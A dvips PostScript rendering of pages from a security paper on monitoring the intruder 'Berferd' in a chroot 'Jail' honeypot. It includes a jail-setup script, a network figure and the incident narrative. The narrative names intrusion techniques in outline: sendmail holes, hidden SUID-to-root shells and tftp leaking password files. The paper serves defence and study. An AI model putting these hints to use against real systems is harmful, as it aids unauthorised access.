/Work75 75 string def /Nmk{Work75 cvs dup}bdf /Npt{put cvn}bdf /dhOdh{Nmk 2 79 Npt}bdf /dhodh{Nmk 2 111 Npt}bdf	/dhSdh{Nmk 2 83 Npt}bdf
/sfWidth{gsave 0 0 moveto 0 0 lineto 0 0 lineto 0 0 lineto closepath clip stringwidth grestore}bdf
/MakOF{dup dhodh FontDirectory 1 index known{exch pop}{exch findfont dup length 1 add dict begin
{1 index/FID ne 2 index /UniqueID ne and{def}{pop pop}ifelse}forall
/PaintType 2 def
/StrokeWidth .24 1000 mul ftSize div dup 12 lt{pop 12}if def
dup currentdict end definefont pop}ifelse}bdf
/fts{dup/ftSize edf}def
% mkFT: newname ft1name ft2name proc -> ; define a Type 3 font that wraps
% two existing fonts.  Its BuildChar stores the font dict as ftdt and the
% one-character string as chrst (via wrk1) inside wdict, then executes proc
% (outproc or ShadChar), which does the actual setcharwidth/show.
% The Encoding is taken from FontDirectory via "3 index" - NOTE(review): on
% the OLFt/ShFt call path traced here that index appears to land on newname,
% which is not yet defined at this point; confirm against a real call.
/mkFT{/tempFT 11 dict def tempFT begin
/FontMatrix [1 0 0 1 0 0] def/FontType 3 def
FontDirectory 3 index get /Encoding get/Encoding exch def
/proc2 edf/ft2 exch findfont def/ft1 exch findfont def/FontBBox [0 0 1 1] def
/BuildChar{wdict begin/chr edf/ftdt edf/chrst wrk1 dup 0 chr put def ftdt/proc2 get exec end}def
end tempFT definefont pop}bdf
% OLFt: basename -> outlinefontname ; outline font (byte 2 of the name set
% to 'O').  Reused if already in FontDirectory; otherwise built with mkFT
% from the base font (ft1) and its MakOF stroked copy (ft2) using outproc.
/OLFt{dup dhOdh FontDirectory 1 index known{exch pop}
{dup 3 -1 roll dup MakOF {outproc} mkFT}ifelse}bdf
% mshw: string x y -> ; moveto then show.
/mshw{moveto show}bdf
% outproc: BuildChar body for OLFt fonts (runs inside wdict; expects ftdt and
% chrst).  Measures the glyph with ft1 via sfWidth, declares that width with
% setcharwidth, then paints it with dblsh.
/outproc{ftdt/ft1 get setfont gsave chrst sfWidth grestore setcharwidth dblsh}bdf
% dblsh: -> ; paint chrst at the origin twice: first filled in white
% (1 setgray) with the currently set font, then, after restoring the saved
% gray, with ft2 (the stroked copy) so only the outline shows in colour.
/dblsh{currentgray 1 setgray chrst 0 0 mshw setgray ftdt/ft2 get setfont chrst 0 0 mshw}bdf
% ShadChar: BuildChar body for ShFt fonts.  Width = sfWidth of the glyph in
% ft1, plus .05 when the x width is non-zero.  Paints the glyph with ft1 at
% (.06, 0) as the shadow, then shifts the origin up by .05 and paints the
% white-filled, outlined glyph on top with dblsh.
/ShadChar{ftdt/ft1 get setfont gsave chrst sfWidth 1 index 0 ne{exch .05 add exch}if grestore setcharwidth
chrst .06 0 mshw 0 .05 translate dblsh}bdf
% ShFt: basename -> shadowfontname ; shadow font (byte 2 of the name set to
% 'S').  Same construction as OLFt but with ShadChar as the BuildChar body.
/ShFt{dup dhSdh FontDirectory 1 index known{exch pop}
{dup 3 -1 roll dup MakOF {ShadChar} mkFT}ifelse}bdf
% LswUnits: -> ; scale the CTM by 72/75 so drawing units are 1/75 inch.
/LswUnits{72 75 div dup scale}bdf
% erasefill: alias for _bp, which is defined earlier in the prolog (not in
% this chunk).
/erasefill{_bp}def
% CVvec: the 256-entry encoding vector cvRecFont installs when asked to
% re-encode a font.  Slots 0-31 carry the ASCII control-code names, 32-127
% are copied from Times-Roman's own Encoding with 39 -> quotesingle and
% 96 -> grave substituted, and 128-255 are filled with the accented and
% symbol glyph names listed below (the layout looks like Macintosh Roman).
/CVvec 256 array def
/NUL/SOH/STX/ETX/EOT/ENQ/ACK/BEL/BS/HT/LF/VT/FF/CR/SO/SI/DLE/DC1/DC2/DC3/DC4/NAK/SYN/ETB/CAN/EM/SUB/ESC/FS/GS/RS/US
CVvec 0 32 getinterval astore pop
CVvec 32/Times-Roman findfont/Encoding get
32 96 getinterval putinterval CVvec dup 39/quotesingle put 96/grave put
/Adieresis/Aring/Ccedilla/Eacute/Ntilde/Odieresis/Udieresis/aacute
/agrave/acircumflex/adieresis/atilde/aring/ccedilla/eacute/egrave
/ecircumflex/edieresis/iacute/igrave/icircumflex/idieresis/ntilde/oacute
/ograve/ocircumflex/odieresis/otilde/uacute/ugrave/ucircumflex/udieresis
/dagger/degree/cent/sterling/section/bullet/paragraph/germandbls
/registered/copyright/trademark/acute/dieresis/notequal/AE/Oslash
/infinity/plusminus/lessequal/greaterequal/yen/mu/partialdiff/summation
/product/pi/integral/ordfeminine/ordmasculine/Omega/ae/oslash
/questiondown/exclamdown/logicalnot/radical/florin/approxequal/Delta/guillemotleft
/guillemotright/ellipsis/blank/Agrave/Atilde/Otilde/OE/oe
/endash/emdash/quotedblleft/quotedblright/quoteleft/quoteright/divide/lozenge
/ydieresis/Ydieresis/fraction/currency/guilsinglleft/guilsinglright/fi/fl
/daggerdbl/periodcentered/quotesinglbase/quotedblbase/perthousand/Acircumflex/Ecircumflex/Aacute
/Edieresis/Egrave/Iacute/Icircumflex/Idieresis/Igrave/Oacute/Ocircumflex
/apple/Ograve/Uacute/Ucircumflex/Ugrave/dotlessi/circumflex/tilde
/macron/breve/dotaccent/ring/cedilla/hungarumlaut/ogonek/caron
CVvec 128 128 getinterval astore pop
end
% --- Figure 1 body ("Connections to the Jail", per the caption that follows
% the embedded document).  This is an EPS exported by a drawing program and
% included by dvips as a \special; CanvasDict, setpen, fg/pg/frg/bkg,
% rectpath, dofillsave, dostroke, doline, origmtx, origpack and the F flag
% are all defined in the Canvas prolog earlier in the file, outside this
% chunk.  This run establishes the initial graphics state: butt caps, miter
% joins, no dash, pen 1x1, then pen 2x2 for the boxes that follow.
CanvasDict begin
0 setlinecap
0 setlinejoin
4 setmiterlimit
/currot 0 def
origmtx currentmatrix pop
[] 0 setdash
1 1 setpen
1 fg
0 pg
0 frg
1 bkg
newpath
/dbg F def
2 2 setpen
% Two boxes and their Courier labels: SETUPSUCKER, CALLSUCKER, JAIL and the
% two-line GATEWAY / MACHINE.  rectpath takes four operands whose order is
% fixed by the prolog (not visible here).  Each label is bracketed by
% save/restore: fts records the size in ftSize before scalefont, and fittext
% receives (string, underline=F, gray-gated=F, JustOffset, NumSpaces,
% StringLength, LetterSpace, SpaceExtra); StringLength matches the literal's
% length in every call.
240.5000 124.5000 2 305.1923 rectpath
F dofillsave
F dostroke
91.1667 151.5000 20 271.9615 rectpath
F dofillsave
F dostroke
save
0 setgray
14 fts /Courier findfont exch scalefont setfont
0 setgray
168 113 moveto
(SETUPSUCKER)
F F 88 0 11 0 0 fittext
restore
save
0 setgray
14 fts /Courier findfont exch scalefont setfont
0 setgray
174 149 moveto
(CALLSUCKER)
F F 80 0 10 0 0 fittext
restore
save
0 setgray
12 fts /Courier findfont exch scalefont setfont
0 setgray
199 56 moveto
(JAIL)
F F 28 0 4 0 0 fittext
restore
save
0 setgray
18 fts /Courier findfont exch scalefont setfont
0 setgray
173 206 moveto
(GATEWAY)
F F 77 0 7 0 0 fittext
0 setgray
173 188 moveto
(MACHINE)
F F 77 0 7 0 0 fittext
restore
% The FIREWALL box (18pt Courier label), drawn like the boxes above.
218 328.5000 29 445.5000 rectpath
F dofillsave
F dostroke
save
0 setgray
18 fts /Courier findfont exch scalefont setfont
0 setgray
345 196 moveto
(FIREWALL)
F F 88 0 8 0 0 fittext
restore
% The LOGS drum: two closed ellipses (four curveto segments each, one
% slightly narrower than the other) form the top rim, two long lineto runs
% (left half from x=414 to 386, right half from 388 to 360) approximate the
% bottom arc, two vertical strokes at x=413.5 and x=359.5 are the sides,
% and a 12pt Courier LOGS label is placed inside.
413.5000 82 moveto
413.5000 77.0632 403.3421 73 391 73 curveto
378.6579 73 368.5000 77.0632 368.5000 82 curveto
368.5000 86.9368 378.6579 91 391 91 curveto
403.3421 91 413.5000 86.9368 413.5000 82 curveto
closepath
F dofillsave
F dostroke
413.5000 82 moveto
413.5000 77.0632 401.3105 73 386.5000 73 curveto
371.6895 73 359.5000 77.0632 359.5000 82 curveto
359.5000 86.9368 371.6895 91 386.5000 91 curveto
401.3105 91 413.5000 86.9368 413.5000 82 curveto
closepath
F dofillsave
F dostroke
414 49 moveto
413.9957 48.7731 lineto
413.9616 48.3197 lineto
413.8935 47.8672 lineto
413.7914 47.4160 lineto
413.6554 46.9668 lineto
413.4858 46.5201 lineto
413.2824 46.0758 lineto
413.0461 45.6356 lineto
412.7768 45.1995 lineto
412.4749 44.7681 lineto
412.1406 44.3416 lineto
411.7741 43.9205 lineto
411.3767 43.5060 lineto
410.9484 43.0983 lineto
410.4897 42.6978 lineto
410.0012 42.3049 lineto
409.4835 41.9202 lineto
408.9364 41.5436 lineto
408.3619 41.1764 lineto
407.7603 40.8190 lineto
407.1323 40.4715 lineto
406.4785 40.1343 lineto
405.7991 39.8076 lineto
405.0962 39.4925 lineto
404.3701 39.1890 lineto
403.6216 38.8973 lineto
402.8517 38.6181 lineto
402.0613 38.3514 lineto
401.2499 38.0973 lineto
400.4213 37.8569 lineto
399.5751 37.6301 lineto
398.7125 37.4171 lineto
397.8343 37.2182 lineto
396.9417 37.0337 lineto
396.0346 36.8635 lineto
395.1165 36.7084 lineto
394.1873 36.5682 lineto
393.2476 36.4430 lineto
392.2996 36.3333 lineto
391.3426 36.2388 lineto
390.3804 36.1601 lineto
389.4129 36.0969 lineto
388.4412 36.0495 lineto
387.4665 36.0178 lineto
386.4900 36.0020 lineto
386 36 lineto
F dostroke
388 36 moveto
387.5113 36.0020 lineto
386.5348 36.0178 lineto
385.5601 36.0494 lineto
384.5884 36.0969 lineto
383.6208 36.1600 lineto
382.6586 36.2387 lineto
381.7017 36.3332 lineto
380.7536 36.4429 lineto
379.8144 36.5679 lineto
378.8851 36.7081 lineto
377.9666 36.8633 lineto
377.0594 37.0334 lineto
376.1669 37.2180 lineto
375.2887 37.4168 lineto
374.4260 37.6298 lineto
373.5798 37.8566 lineto
372.7512 38.0970 lineto
371.9401 38.3509 lineto
371.1493 38.6177 lineto
370.3793 38.8970 lineto
369.6309 39.1886 lineto
368.9047 39.4921 lineto
368.2010 39.8076 lineto
367.5223 40.1339 lineto
366.8685 40.4710 lineto
366.2405 40.8185 lineto
365.6389 41.1760 lineto
365.0646 41.5430 lineto
364.5172 41.9197 lineto
363.9994 42.3044 lineto
363.5109 42.6972 lineto
363.0522 43.0978 lineto
362.6238 43.5055 lineto
362.2264 43.9199 lineto
361.8599 44.3411 lineto
361.5257 44.7673 lineto
361.2237 45.1988 lineto
360.9543 45.6350 lineto
360.7179 46.0752 lineto
360.5144 46.5195 lineto
360.3448 46.9662 lineto
360.2088 47.4154 lineto
360.1066 47.8666 lineto
360.0384 48.3191 lineto
360.0043 48.7725 lineto
360 49 lineto
F dostroke
gsave
newpath
413.5000 82 moveto
413.5000 46 lineto
F dostroke
grestore
gsave
newpath
359.5000 82 moveto
359.5000 46 lineto
F dostroke
grestore
save
0 setgray
12 fts /Courier findfont exch scalefont setfont
0 setgray
372 55 moveto
(LOGS)
F F 28 0 4 0 0 fittext
restore
% Connecting arrows.  Each arrow is a closed three-point triangle (the head)
% painted through doline, followed by a straight shaft through dostroke;
% every piece is wrapped in gsave/newpath/.../grestore so nothing leaks
% into the next path.  One more rectpath box (164 356.5 110 419.5) is drawn
% between the left-hand and right-hand arrows.
gsave
newpath
167.5000 155 moveto
153.1556 150.6140 lineto
153.1553 159.3851 lineto
167.5000 155 lineto
closepath
F doline
grestore
gsave
newpath
104.5000 155 moveto
153.1554 155 lineto
F dostroke
grestore
gsave
newpath
212.5000 74 moveto
208.1148 88.3447 lineto
216.8860 88.3444 lineto
212.5000 74 lineto
closepath
F doline
grestore
gsave
newpath
212.5000 110 moveto
212.5000 88.3446 lineto
F dostroke
grestore
164 356.5000 110 419.5000 rectpath
F dofillsave
F dostroke
gsave
newpath
387.5000 79 moveto
383.6180 93.4890 lineto
392.3838 93.1827 lineto
387.5000 79 lineto
closepath
F doline
grestore
gsave
newpath
388.5000 109 moveto
387.9779 93.3366 lineto
F dostroke
grestore
gsave
newpath
356.5000 155 moveto
342.1556 150.6140 lineto
342.1553 159.3851 lineto
356.5000 155 lineto
closepath
F doline
grestore
gsave
newpath
257.5000 155 moveto
342.1554 155 lineto
F dostroke
grestore
gsave
newpath
258.5000 117 moveto
272.8447 121.3851 lineto
272.8447 112.6148 lineto
258.5000 117 lineto
closepath
F doline
grestore
gsave
newpath
355.5000 117 moveto
272.8447 117 lineto
F dostroke
grestore
% Last label (LDCON), then teardown of the embedded figure: restore the
% matrix saved in origmtx, restore packing mode if the interpreter supports
% it, close CanvasDict, and showpage (dvips normally neutralises showpage
% inside a \special; that redefinition is not visible in this chunk).
save
0 setgray
12 fts /Courier findfont exch scalefont setfont
0 setgray
370 132 moveto
(LDCON)
F F 35 0 5 0 0 fittext
restore
origmtx setmatrix
systemdict /setpacking known {origpack setpacking} if end
showpage
%%EndDocument
 @endspecial 681 1091 a Fg(Figur)o(e)12 b(1:)35 b Ff(Connections)9
b(to)h(the)g(Jail.)p 300 1138 1351 2 v 0 1246 a(to)e(those)h(machines)h(from)
e(a)i(terminal)e(server)h(connected)h(to)e(a)h(Gandalf)g(switch.)14
b(He)c(connected)f(to)f(the)h(Gandalf)f(over)h(a)h(telephone)0
1296 y(line.)0 1364 y(I)g(checked)h(the)f(times)g(he)g(logged)f(in)g(to)h
(make)h(a)f(guess)h(about)e(the)h(time)g(zone)g(he)g(might)f(be)h(in.)15
b(Here)c(was)f(a)h(simple)f(graph)f(I)h(made)0 1414 y(of)g(his)g(session)g
(start)g(times)g(\(PST\):)733 1488 y Fb(1)202 b(2)352 1527
y(Jan)91 b(0123456789)q(01)q(234)q(56)q(78)q(901)q(23)329 1566
y(s)23 b(19)517 b(x)329 1606 y(s)23 b(20)517 b(xxxx)329 1645
y(m)23 b(21)180 b(x)23 b(x)68 b(xxxx)329 1685 y(t)23 b(22)404
b(xxxxx)47 b(x)329 1724 y(w)23 b(23)203 b(xx)68 b(x)23 b(xx)68
b(x)23 b(xx)329 1764 y(t)g(24)337 b(x)180 b(x)329 1803 y(f)23
b(25)248 b(x)45 b(xxxx)329 1842 y(s)23 b(26)329 1882 y(s)g(27)225
b(xxxx)136 b(xx)68 b(x)329 1921 y(m)23 b(28)203 b(x)23 b(x)179
b(x)329 1961 y(t)23 b(29)203 b(x)224 b(xxxx)24 b(x)329 2000
y(w)f(30)472 b(x)329 2040 y(t)23 b(31)91 b(xx)352 2079 y(Feb)g(0123456789)q
(01)q(234)q(56)q(78)q(901)q(23)329 2118 y(f)46 b(1)247 b(x)202
b(x)45 b(x)329 2158 y(s)h(2)359 b(x)22 b(xx)i(xxx)329 2197
y(s)46 b(3)247 b(x)45 b(x)90 b(xxxx)24 b(x)329 2237 y(m)46
b(4)448 b(x)0 2321 y Ff(It)11 b(seemed)j(to)d(suggest)h(a)g(sleep)g(period)f
(on)h(the)g(east)g(coast)g(of)g(the)g(U.S.,)h(but)e(programmers)i(are)f
(noted)g(for)f(strange)h(hours.)19 b(This)0 2371 y(analysis)10
b(wasn')o(t)g(very)h(useful,)f(but)f(was)i(worth)e(a)i(try)m(.)0
2439 y(Stanford')n(s)f(battle)g(with)g(Berferd)g(is)h(an)g(entire)f(story)g
(on)h(its)f(own,)h(and)g(I)g(only)e(know)i(the)f(outlines)g(of)g(their)g(ef)o
(forts.)17 b(It)10 b(took)g(them)0 2488 y(a)j(long)f(time)g(to)g(arrange)h
(for)f(a)h(trace,)h(and)f(they)f(eventually)g(obtained)f(several.)23
b(The)13 b(calls)g(came)h(from)e(the)h(Netherlands.)21 b(The)0
2538 y(Dutch)10 b(phone)g(company)g(refused)h(to)e(continue)h(the)g(trace)h
(to)e(the)h(caller)h(because)h(hacking)d(was)i(legal)f(and)h(there)f(was)h
(no)f(treaty)g(in)0 2588 y(place.)16 b(\(A)10 b(treaty)g(requires)g(action)g
(by)g(the)g(Executive)g(branch)h(and)f(approval)g(by)f(the)i(U.S.)g
(Senate.\))0 2656 y(In)e(January)m(,)i(W)n(ietse)g(V)-5 b(enema)11
b(of)f(Eindhoven)f(University)f(contacted)i(Stanford.)k(W)n(ietse)c(hunted)f
(down)g(a)i(group)d(of)i(hackers,)h(and)0 2706 y(identi\256ed)e(Berferd,)h
(including)e(his)i(name,)i(address,)f(and)f(phone)g(number)n(.)k(He)d(also)f
(kept)g(an)g(eye)h(on)f(Berferd')n(s)f(friends)h(and)g(their)p
eop
%%Page: 10 10
% Page 10 of the paper, dvips-encoded: bop/eop bracket the page and the
% one-letter procedures (a, b, p, q, v, y, ...) and the Fb/Fc/Fe/Ff/Fg font
% selectors come from the texc.pro procset defined at the top of the file.
% The page opens with Figure 2, the typeset text of the "setupsucker" script
% the caption says emulates login for the Jail: it derives the login name
% from the service string, builds HOME/PATH/USER/SHELL, writes the Jail's own
% utmp entry, chowns the pseudo-tty, and enters the session with
% /etc/chroot into /usr/spool/hacker (the caption notes the care taken to
% keep setup errors out of the intruder's view).  The rest of the page is
% the narrative of section 7, "Berferd comes home".  Do not edit the string
% literals: the numbers between them are positioning data tied to their
% typeset widths.
bop 150 66 a Fb(#)157 b(setupsuc)q(ker)26 b(login)150 145 y(SUCKERROO)q(T=)q
(/us)q(r/)q(spo)q(ol)q(/h)q(ack)q(er)150 184 y(login=`ec)q(ho)g($CDEST)f(|)e
(cut)g(-f4)h(-d!`)g(#)f(extract)i(login)g(from)f(service)h(name)150
224 y(home=`egr)q(ep)h("\303$login:)q(")g($SUCKERROO)q(T/)q(etc)q(/p)q(ass)q
(wd)g(|)d(cut)h(-d:)f(-f6`)150 303 y(PATH=/v:/)q(bs)q(d43)q(:/)q(sv;)116
b(export)25 b(PATH)150 342 y(HOME=$hom)q(e;)295 b(export)25
b(HOME)150 382 y(USER=$log)q(in)q(;)272 b(export)25 b(USER)150
421 y(SHELL=/v/)q(sh)q(;)272 b(export)25 b(SHELL)150 461 y(unset)f(CSOURCE)i
(CDEST)e(#)f(hide)h(these)h(Datakit)g(strings)150 539 y(#get)f(the)g(tty)f
(and)h(pid)g(to)f(set)h(up)f(the)h(fake)g(utmp)150 579 y(tty=`/bin)q(/w)q(ho)
i(|)d(/bin/grep)j($login)f(|)e(/usr/bin/c)q(ut)j(-c15-17)f(|)e(/bin/tail)j
(-1`)150 618 y(/usr/adm/)q(ut)q(too)q(ls)q(/te)q(ln)q(et)q(use)q(ro)q(n)f
(/usr/spo)q(ol)q(/ha)q(ck)q(er)q(/et)q(c/)q(utm)q(p)h(\\)329
658 y($login)f($tty)f($$)g(1>/dev/nul)q(l)i(2>/dev/nul)q(l)150
737 y(chown)e($login)h(/usr/spo)q(ol)q(/ha)q(ck)q(er/)q(de)q(v/)q(tty)q($t)q
(ty)h(1>/dev/nu)q(ll)g(2>/dev/nu)q(ll)150 776 y(chmod)e(622)g(/usr/spoo)q(l/)
q(ha)q(cke)q(r/)q(dev)q(/t)q(ty)q($tt)q(y)i(1>/dev/nul)q(l)g(2>/dev/nul)q(l)
150 855 y(/etc/chro)q(ot)g(/usr/spoo)q(l/)q(hac)q(ke)q(r)f(/v/su)g(-c)e
("$login")j(/v/sh)e(-c)g("cd)f($HOME;)329 894 y(exec)h(/v/sh)h(/etc/prof)q
(ile)q(")150 934 y(/usr/adm/)q(ut)q(too)q(ls)q(/te)q(ln)q(et)q(use)q(ro)q(ff)
h(/usr/spoo)q(l/h)q(ac)q(ke)q(r/e)q(tc)q(/ut)q(mp)g($tty)e(\\)329
973 y(>/dev/nu)q(ll)i(2>/dev/nu)q(ll)0 1106 y Fg(Figur)o(e)17
b(2:)45 b Ff(The)17 b Fe(setupsucker)f Ff(shell)f(script)g(emulates)h
Fe(login)p Ff(,)g(and)g(it)e(is)i(quite)e(tricky)m(.)31 b(W)m(e)16
b(had)f(to)g(make)i(the)e(environment)0 1156 y(variables)c(look)f(reasonable)
i(and)g(attempted)f(to)f(maintain)h(the)g(Jail')n(s)g(own)f(special)i
Fc(utmp)f Ff(entries)g(for)g(the)g(residents.)18 b(W)m(e)11
b(had)h(to)0 1206 y(be)f(careful)f(to)g(keep)h(errors)f(in)f(the)i(setup)f
(scripts)f(from)h(the)h(hacker)r(')n(s)f(eyes.)p 300 1253 1351
2 v 0 1361 a(activities.)0 1429 y(At)g(Stanford,)f(Berferd)h(was)g(causing)g
(mayhem.)16 b(He)11 b(had)f(subverted)f(a)i(number)f(of)f(machines)i(and)f
(probed)f(many)i(more.)k(Stephen)0 1479 y(Hansen)f(at)f(Stanford)e(and)i(T)m
(sutomu)g(Shimomura)g(of)g(Los)g(Alamos)g(had)g(some)h(of)e(the)h(networks)f
(bugged.)23 b(T)m(sutomu)12 b(modi\256ed)0 1529 y Fe(tcpdump)e
Ff(to)f(provide)h(a)h(time-stamped)f(recording)g(of)g(each)i(packet.)k(This)
11 b(allowed)f(him)g(to)g(replay)g(real-time)h(terminal)f(sessions.)0
1579 y(Berferd)g(attacked)g(many)g(systems)g(at)f(Stanford.)15
b(They)10 b(got)e(very)i(good)f(at)g(stopping)f(his)h(attacks)h(within)e
(minutes)h(after)h(he)g(logged)0 1628 y(into)h(a)j(new)f(machine.)23
b(In)12 b(one)h(instance)g(they)f(watched)h(his)f(progress)h(using)f(the)g
Fe(ps)h Ff(command.)23 b(His)13 b(login)e(name)j(changed)f(to)0
1678 y Fe(uucp)d Ff(and)g(then)g Fe(bin)g Ff(before)g(the)g(machine)h
(\252had)g(disk)f(problems.\272)0 1746 y(Berferd)15 b(used)g(Stanford)g(as)g
(a)h(base)g(for)f(many)g(months.)30 b(There)16 b(are)f(tens)h(of)e(megabytes)
i(of)f(logs)g(of)f(his)h(activites.)29 b(He)16 b(had)0 1796
y(remarkable)9 b(persistence)g(at)g(a)g(very)g(boring)e(job)g(of)i(poking)e
(computers.)14 b(Once)c(he)e(got)g(an)h(account)g(on)f(a)h(machine,)h(there)f
(was)g(little)0 1845 y(hope)g(for)g(the)h(system)g(administrator)n(.)j
(Berferd)c(had)h(a)g(\256ne)g(list)e(of)i(security)f(holes.)14
b(He)c(knew)g(obscure)g Fe(sendmail)e Ff(parameters)j(and)0
1895 y(used)g(them)g(well.)16 b(\(Y)l(es,)c(some)f Fe(sendmail)p
Ff(s)f(have)i(security)e(holes)h(for)f(logged-in)f(users,)j(too.)k(Why)10
b(is)h(such)g(a)g(lar)o(ge)g(and)g(complex)0 1945 y(program)f(allowed)f(to)h
(run)f(as)i Fe(r)n(oot)p Ff(?\))k(He)c(had)f(a)g(collection)f(of)h
(thoroughly)d(invaded)j(machines,)h(complete)g(with)e(SUID-to-)p
Fc(root)0 1995 y Ff(shell)h(scripts)g(usually)f(stored)h(in)f
Fc(/usr/lib/term/.s)p Ff(.)14 b(Y)l(ou)c(do)g(not)f(want)h(to)g(give)g(him)g
(an)g(account)h(on)f(your)f(computer)n(.)0 2124 y Fg(7.)21
b(Berferd)12 b(comes)e(home)83 2220 y Ff(In)i(the)g(Sunday)f(New)i(Y)l(ork)e
(T)o(imes)i(on)f(21)f(April)g(1991,)h(John)g(Markof)o(f)g(broke)f(some)i(of)f
(the)g(Berferd)g(story)m(.)20 b(He)13 b(said)f(that)0 2269
y(authorities)g(were)j(pursuing)e(several)h(Dutch)g(hackers,)i(but)d(were)i
(unable)f(to)f(prosecute)h(them)g(because)i(hacking)d(is)h(not)f(illegal)0
2319 y(under)d(Dutch)g(law)m(.)0 2387 y(The)j(hackers)f(heard)g(about)g(the)f
(article)h(within)e(a)i(day)g(or)g(so.)20 b(W)n(ietse)13 b(collected)e(some)i
(mail)f(between)g(several)h(members)g(of)e(the)0 2437 y(Dutch)h(cracker)i
(community)m(.)22 b(It)12 b(was)i(clear)f(that)f(they)g(had)h(bought)e(the)i
(\256ction)f(of)g(our)g(machine')n(s)h(demise.)23 b(One)13
b(of)g(Berferd')n(s)0 2486 y(friends)d(found)f(it)g(strange)i(that)e(the)h(T)
o(imes)h(didn')o(t)e(include)g(our)h(computer)g(in)g(the)g(list)f(of)h(those)
g(damaged.)0 2554 y(On)i(1)g(May)g(Berferd)f(logged)g(into)g(the)h(Jail.)20
b(By)11 b(this)g(time)h(we)h(could)e(recognize)h(him)g(by)f(his)h(typing)e
(speed)j(and)e(errors)h(and)g(the)0 2604 y(commands)i(he)g(used)f(to)f(check)
i(around)f(and)g(attack.)24 b(He)14 b(probed)e(various)h(computers,)h(while)f
(consulting)e(the)i(network)f Fe(whois)0 2654 y Ff(service)g(for)f(certain)g
(brands)g(of)g(hosts)g(and)h(new)f(tar)o(gets.)19 b(He)11 b(did)g(not)f
(break)i(into)e(any)h(of)g(the)h(machines)g(he)g(tried)e(from)h(our)g(Jail.)0
2704 y(Of)e(the)h(hundred-odd)d(sites)j(he)f(attacked,)i(three)e(noticed)g
(the)g(attempts,)h(and)g(followed)e(up)h(with)f(calls)i(from)f(very)g
(serious)h(security)p eop
%%Page: 11 11
% Page 11 of the paper, dvips-encoded (same texc.pro conventions as the
% preceding pages).  Content, as typeset: the close of section 7 (the value
% of keeping logs of an intrusion for the victims), section 8 "Conclusions"
% - a login on a machine is a good chance of eventual root, the Jail was
% not worth the effort versus a throwaway machine plus a passive monitor
% with its transmit wire cut, and tftp / unused-port probes are worth
% monitoring - then section 9 "Acknowledgements", section 10 "References"
% and the author biography.  String literals and the positioning numbers
% between them belong together; leave both untouched.
bop 0 42 a Ff(of)o(\256cers.)21 b(I)11 b(explained)h(to)f(them)h(that)f(the)h
(hacker)g(was)h(legally)e(untouchable)g(as)h(far)g(as)h(I)e(knew)m(,)i(and)f
(the)g(best)g(we)g(could)f(do)g(was)0 91 y(log)f(his)h(activities)f(and)i
(supply)e(logs)g(to)h(the)g(victims.)17 b(Berferd)11 b(had)g(many)h(bases)g
(for)f(laundering)f(his)g(connections.)18 b(It)10 b(was)i(only)0
141 y(through)d(persistence)i(and)f(luck)g(that)g(he)h(was)g(logged)f(at)g
(all.)16 b(W)m(ould)9 b(the)h(system)h(administrator)e(of)h(an)h(attacked)g
(machine)g(prefer)0 191 y(a)g(log)f(of)h(the)g(cracker)r(')n(s)g(attack)g(to)
f(vague)i(deductions?)k(Damage)c(control)e(is)g(much)i(easier)f(when)g(the)g
(actual)g(damage)h(known.)k(If)0 241 y(a)11 b(system)g(administrator)d
(doesn')o(t)i(have)h(a)g(log,)e(he)i(should)e(reload)h(his)g(compromised)g
(system)h(from)f(the)g(release)i(tapes.)0 308 y(The)f(systems)g
(administrators)e(and)h(their)f(management)j(agreed)f(with)e(me,)j(and)e
(asked)h(that)e(I)i(keep)f(the)h(Jail)f(open.)0 376 y(At)f(the)g(request)g
(of)g(management)h(I)f(shut)f(the)h(Jail)g(down)g(on)f(3)h(May)m(.)16
b(Berferd)9 b(tried)f(to)g(reach)i(it)f(a)g(few)h(times,)g(and)f(went)g(away)
m(.)15 b(The)0 426 y(last)10 b(I)g(heard)h(was)g(that)e(he)i(was)g(operating)
e(from)h(a)h(computer)f(in)g(Sweden.)0 556 y Fg(8.)21 b(Conclusions)83
652 y Ff(For)10 b(me,)i(the)e(most)g(important)f(lesson)h(was)83
740 y Fe(if)e(a)h(hacker)h(obtains)e(a)h(login)e(on)i(a)g(machine,)g(ther)n
(e)h(is)f(a)g(good)f(chance)i(he)f(can)g(become)h Fc(root)f
Fe(sooner)g(or)g(later)-5 b(.)15 b(Ther)n(e)83 790 y(ar)n(e)c(many)f(buggy)g
(pr)n(ograms)g(that)f(run)h(at)g(high)f(privileged)g(levels)i(that)e(offer)h
(opportunities)e(for)h(a)h(cracker)-5 b(.)18 b(If)10 b(he)g(gets)83
840 y(a)g(login)f(on)h(your)g(computer)-5 b(,)11 b(you)f(ar)n(e)i(in)d(tr)n
(ouble.)0 928 y Ff(Other)h(conclusions)f(are:)42 1017 y Fd(\017)20
b Ff(Though)12 b(the)g(Jail)h(was)g(an)g(interesting)e(and)h(educational)h
(exercise,)h(it)e(was)h(not)f(worth)g(the)g(ef)o(fort.)22 b(It)12
b(is)g(too)g(hard)g(to)g(get)h(it)83 1066 y(right,)d(and)h(never)h(quite)e
(secure.)19 b(A)11 b(better)f(arrangement)i(involves)e(a)h(throwaway)g
(machine)h(with)e(real)h(security)g(holes,)g(and)83 1116 y(a)g(monitoring)d
(machine)j(on)f(the)g(same)i(Ethernet)e(to)g(capture)h(the)f(bytes.)16
b(Our)10 b(version)f(of)h(the)h(monitoring)d(machine)j(had)f(the)83
1166 y(transmit)f(wire)i(in)e(the)h(transceiver)h(cable)g(cut)f(to)g(avoid)f
(any)i(possibility)c(of)j(releasing)g(telltale)g(packets.)42
1243 y Fd(\017)20 b Ff(Breaking)10 b(into)f(computers)h(requires)g(a)h(good)e
(list)g(of)h(security)g(holes)g(and)g(a)h(lot)e(of)h(persistence.)42
1320 y Fd(\017)20 b Ff(Processing)10 b(these)h(security)f(pokes)g(isn')o(t)f
(much)i(fun)f(any)g(more.)0 1408 y(Once)i(you)f(go)f(out)h(of)g(the)g
(computer)g(environment)f(that)h(you)f(control,)h(tracing)g(is)g(dif)o
(\256cult.)17 b(It)10 b(can)i(involve)e(many)i(carriers,)g(law)0
1458 y(enforcement)f(agencies,)h(and)e(even)h(the)f(U.S.)h(Senate.)0
1526 y(There)j(are)f(other)g(services)g(we)h(should)e(monitor)n(.)21
b Fe(Tftp)12 b Ff(is)h(certainly)f(one:)20 b(it)12 b(easily)h(provided)e(the)
i(password)g(\256le)g(from)f(a)i(lar)o(ge)0 1576 y(number)c(of)h(machines)g
(I)f(tested.)16 b(I)11 b(would)e(also)i(like)f(to)g(monitor)f(unsuccessful)h
(connection)g(attempts)h(to)e(unused)i(UDP)f(and)h(TCP)0 1625
